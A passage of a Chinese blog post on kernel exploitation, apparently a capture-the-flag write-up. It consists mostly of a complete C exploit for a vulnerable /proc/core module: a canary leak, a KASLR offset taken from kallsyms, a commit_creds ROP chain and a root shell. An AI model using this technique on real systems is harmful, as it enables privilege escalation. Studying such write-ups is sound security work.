class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/ioctl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> kernel_base 0xffffffff81000000;<span class="hljs-comment">//从vmlinux中找的gadgets</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> COMMIT_CREDS 0xffffffff8109c8e0;</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> POP_RDI_RET 0xffffffff81000b2f</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> POP_RDX_RET 0xffffffff810a0f49</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> POP_RCX_RET 0xffffffff81021e53</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> SWAPGS_POPFQ_RET 0xffffffff81a012da</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> IRETQ 0xffffffff81050ac2</span><br><span class="hljs-type">size_t</span> rop[<span class="hljs-number">100</span>];<br><span class="hljs-type">size_t</span> user_cs,user_ss,user_rflags,user_sp;<span class="hljs-comment">//这里存我需要保存的寄存器值</span><br><span class="hljs-type">size_t</span> commit_creds=<span class="hljs-number">0</span>,prepare_kernel_cred=<span class="hljs-number">0</span>;<br><span class="hljs-type">size_t</span> kernel_offset;<br><span class="hljs-type">void</span> <span class="hljs-title function_">save_status</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span><span class="hljs-comment">//保存寄存器，以便返回用户态</span><br>&#123;<br>    <span class="hljs-keyword">asm</span> <span class="hljs-title function_">volatile</span> <span class="hljs-params">(</span><br><span class="hljs-params">        <span class="hljs-string">&quot;mov user_cs, cs;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;mov user_ss, ss;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;mov user_sp, rsp;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;pushf;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;pop user_rflags;&quot;</span></span><br><span class="hljs-params">    )</span>;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[*] Status has been saved.\n\n&quot;</span>);<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">core_read</span><span class="hljs-params">(<span class="hljs-type">int</span> fd,<span class="hljs-type">char</span> *buf)</span><br>&#123;<br>    ioctl(fd,<span class="hljs-number">0x6677889B</span>,buf);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Sucee read!\n&quot;</span>);<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">set_off</span><span class="hljs-params">(<span class="hljs-type">int</span> fd,<span class="hljs-type">size_t</span> off)</span><br>&#123;<br>    ioctl(fd,<span class="hljs-number">0x6677889C</span>,off);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Success set off!\n&quot;</span>);<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">core_copy</span><span class="hljs-params">(<span class="hljs-type">int</span> fd)</span><br>&#123;<br>    ioctl(fd,<span class="hljs-number">0x6677889A</span>,<span class="hljs-number">0xffffffffffff0000</span>|(<span class="hljs-number">0x100</span>)); <span class="hljs-comment">//这里就是拷贝256个字节</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Success copy!\n&quot;</span>);<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">get_shell</span><span class="hljs-params">()</span><br>&#123;<br>    <span class="hljs-keyword">if</span> (getuid())<span class="hljs-comment">//如果成功，uid为0，这里判断是否root</span><br>    &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Fail to get root!\n&quot;</span>);<br>        <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Success to get root!\n&quot;</span>);<br>    system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>    <span class="hljs-built_in">exit</span>(EXIT_SUCCESS);<br>&#125;<br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br>    <span class="hljs-type">char</span> buf[<span class="hljs-number">0x1000</span>],type[<span class="hljs-number">0x10</span>];<br>    <span class="hljs-type">int</span> fd;<br>    <span class="hljs-type">size_t</span> addr;<br>    <span class="hljs-type">size_t</span> canary;<br>    save_status();<span class="hljs-comment">//保存寄存器</span><br>    fd=open(<span class="hljs-string">&quot;/proc/core&quot;</span>,O_RDWR);<br>    <span class="hljs-keyword">if</span> (fd&lt;<span class="hljs-number">0</span>)<br>    &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Eorror\n&quot;</span>);<br>        <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>    &#125;<br>    <span class="hljs-comment">//leak offset</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;----leak addr----&quot;</span>);<br>    FILE *ksyms_file=fopen(<span class="hljs-string">&quot;/tmp/kallsyms&quot;</span>,<span class="hljs-string">&quot;r&quot;</span>);<span class="hljs-comment">//读取/tmp/kallsyms中的地址</span><br>    <span class="hljs-keyword">if</span> (ksyms_file==<span class="hljs-literal">NULL</span>)<br>    &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Fail to open file!\n&quot;</span>);<br>        <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>    &#125;<br>    <span class="hljs-keyword">while</span> (<span class="hljs-built_in">fscanf</span>(ksyms_file,<span class="hljs-string">&quot;%lx%s%s&quot;</span>,&amp;addr,type,buf))<br>    &#123;<br>        <span class="hljs-keyword">if</span> (prepare_kernel_cred&amp;&amp;commit_creds)<span class="hljs-comment">//寻找prepare_kernel_cred和commit_creds的地址</span><br>            <span class="hljs-keyword">break</span>;<br>        <span class="hljs-keyword">if</span> (!<span class="hljs-built_in">strcmp</span>(buf,<span class="hljs-string">&quot;commit_creds&quot;</span>))<br>        &#123;<br>            commit_creds=addr;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Success get commit_creds&#x27;s addr %lx !\n&quot;</span>,commit_creds);<br>        &#125;<br>        <span class="hljs-keyword">if</span> (!<span class="hljs-built_in">strcmp</span>(buf,<span class="hljs-string">&quot;prepare_kernel_cred&quot;</span>))<br>        &#123;<br>            prepare_kernel_cred=addr;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Success get prepare_kernel_cred&#x27;s addr %lx !\n&quot;</span>,prepare_kernel_cred);<br>        &#125;<br>    &#125;<br>    kernel_offset=commit_creds-COMMIT_CREDS;<span class="hljs-comment">//计算kaslr的偏移</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;---leak canary---\0&quot;</span>);<span class="hljs-comment">//泄露canary</span><br>    set_off(fd,<span class="hljs-number">64</span>);<br>    core_read(fd,buf);<br>    canary=((<span class="hljs-type">size_t</span>*)buf)[<span class="hljs-number">0</span>];<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Success get canary %lx !\n&quot;</span>,canary);<br>    <span class="hljs-type">int</span> i;<br>    <span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;<span class="hljs-number">10</span>;i++)<br>        rop[i]=canary;<br>    rop[i++]=POP_RDI_RET+kernel_offset;<br>    rop[i++]=<span class="hljs-number">0</span>;<br>    rop[i++]=prepare_kernel_cred; <span class="hljs-comment">//perpare_kernel_cred(0)</span><br>    rop[i++]=POP_RDX_RET+kernel_offset;<br>    rop[i++]=POP_RCX_RET+kernel_offset;<br>    rop[i++]=MOV_RDI_RAX_CALL_RDX+kernel_offset; <span class="hljs-comment">//commit(perpare_kernel_cred(0))</span><br>    rop[i++]=commit_creds;<br><span class="hljs-comment">//     解释一下这里为什么要这样构造，首先pop rdx ret会将pop rcx的地址压入rdx之中，此时rdx中存储的地址是pop rcx，接着rip为mov rdi rax....，这里call指令会将rip指向的下一个地址压入栈中，然后执行rdx中的内容，这里栈顶就不是commit_creds了，是这个mov...这个gadgets的下一条指令，接着我们执行rdx中内容，也就是pop rcx，将栈顶弹出到rcx中，此时rsp有指向commit_creds，这样就可以返回到commit_creds上了。rcx起到了垃圾桶的作用，使栈顶为commit_Creds。至于为什么要有mov rdi, rax，因为之前prepare_kernel_cred(O)会创建一个cred结构并且将指针返回到rax之中</span><br>    <span class="hljs-comment">//return to user space</span><br>    rop[i++]=SWAPGS_POPFQ_RET+kernel_offset;<br>    rop[i++]=<span class="hljs-number">0</span>;<br>    rop[i++]=IRETQ+kernel_offset;<br>    rop[i++]=(<span class="hljs-type">size_t</span>*)get_shell;<br>    rop[i++]=user_cs;<br>    rop[i++]=user_rflags;<br>    rop[i++]=user_sp;<br>    rop[i++]=user_ss;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Rop get ready!\n&quot;</span>);<br>    write(fd,rop,<span class="hljs-number">0x800</span>);<br>    core_copy(fd);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/kernel/" class="print-no-link">#kernel</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>kernel expolitation</div>
      <div>http://yyyffff.github.io/2025/08/26/kernel expolitation/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>yyyffff</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年8月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/09/17/2025%E6%B9%BE%E5%8C%BA%E6%9D%AF%E9%83%A8%E5%88%86pwn%E5%A4%8D%E7%8E%B0/" title="2025湾区杯部分pwn复现">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2025湾区杯部分pwn复现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/08/07/kernel%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E5%8F%8A%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" title="kernel基础知识及环境搭建">
                        <span class="hidden-mobile">kernel基础知识及环境搭建</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"2bkS2AvQTqNk4TIsyxh4ew9q-gzGzoHsz","appKey":"GfRH0zMaM1USTNT6w25DTqu8","path":"window.location.pathname","placeholder":"说点什么","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
